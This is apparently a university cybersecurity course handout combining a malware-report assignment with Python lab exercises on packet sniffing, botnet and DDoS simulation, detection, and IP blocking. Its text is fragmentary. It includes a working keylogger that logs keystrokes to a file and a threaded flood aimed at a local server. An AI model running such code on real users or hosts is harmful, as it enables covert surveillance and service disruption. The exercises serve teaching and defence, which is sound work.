Assignment#1 (1)
Assignment#1 (1)
CYB 131
Assignment #1
Ethical Disclaimer
This guide and attached examples to apply are strictly for educational and research purposes.
Any created malware is illegal if used maliciously. Ensure that you practice this in a controlled
environment on your own system. Unauthorized use violates cybersecurity laws.
Assignment Requirements:
1. Select a Malware Type: Choose one specific type of malware (e.g., DDoS Attack,
Keylogging, ransomware, spyware, Trojan horse, etc.).
6. References: Include at least 3-5 credible sources that provide information about the
selected malware, using proper citation formats.
Assignment Details:
• Group Work: The assignment should be completed in groups of 3-4 students.
• Length: The report should be 500-700 words in length, not including references.
• Use of AI: Students are encouraged to use AI tools to gather information and enhance
their research. Mention how AI tools contributed to the analysis and what additional
insights were gained through their use.
• Presentation: Present the findings in a clear, structured, and professional manner. Use
headings and subheadings for each section.
Submission Guidelines:
• Deadline: 15 October 2024
• Format: Submit the assignment as a PDF document via blackboard
• Structure: Include a cover page with the group members' names, student IDs, and the
assignment title. Use consistent formatting (e.g., font size 12, Times New Roman, 1.5 line
spacing).
6. Presentation (4 marks):
- Present the findings about the selected malware in a clear, structured, and professional
manner. Use headings and subheadings for each section.
- Present the screen shots for the created Python script for simulating the selected malware
in a clear, structured based on step-by–step describing how did you the malware
performed.
Note:
Focus on collaborating effectively within your group to divide the workload. Explore how AI
tools can aid in your research and provide a unique perspective on the selected malware.
Your detailed analysis, along with current updates, will help deepen your understanding of
cybersecurity threats and defense strategies.
Lab 3
Objective
To practice botnet simulation, attack detection, and mitigation using Python Pycharm,
with step-by-step guidance.
Task:
Write a Python script to capture and print network packets using Scapy.
Instructions:
def packet_callback(packet):
print(packet.summary())
Task:
@app.route('/')
def home():
return "Server is running!"
if __name__ == "__main__":
app.run(host='127.0.0.1', port=80)
target_ip = "127.0.0.1"
target_port = 80
threads = []
for i in range(100):
thread = threading.Thread(target=attack, args=(target_ip,
target_port))
threads.append(thread)
thread.start()
Task:
• Records keystrokes.
• Saves them to a file keylog.txt.
Beginner Instructions:
def keylogger():
with open("keylog.txt", "a") as log:
while True:
event = keyboard.read_event()
if event.event_type == keyboard.KEY_DOWN:
log.write(event.name + "\n")
keylogger()
Task:
Beginner Instructions:
request_counts = defaultdict(int)
def detect_ddos(ip):
request_counts[ip] += 1
if request_counts[ip] > 10:
print(f"Potential DDoS attack detected from {ip}!")
# Simulate requests
for i in range(12):
detect_ddos("192.168.1.1")
Exercise 5: Blocking Malicious IPs
Task:
Beginner Instructions:
def block_ip(ip):
os.system(f"sudo iptables -A INPUT -s {ip} -j DROP")
print(f"Blocked {ip}")
block_ip("192.168.1.1")
Note: iptables only works on Linux. If using Windows, manually block the IP in
firewall settings.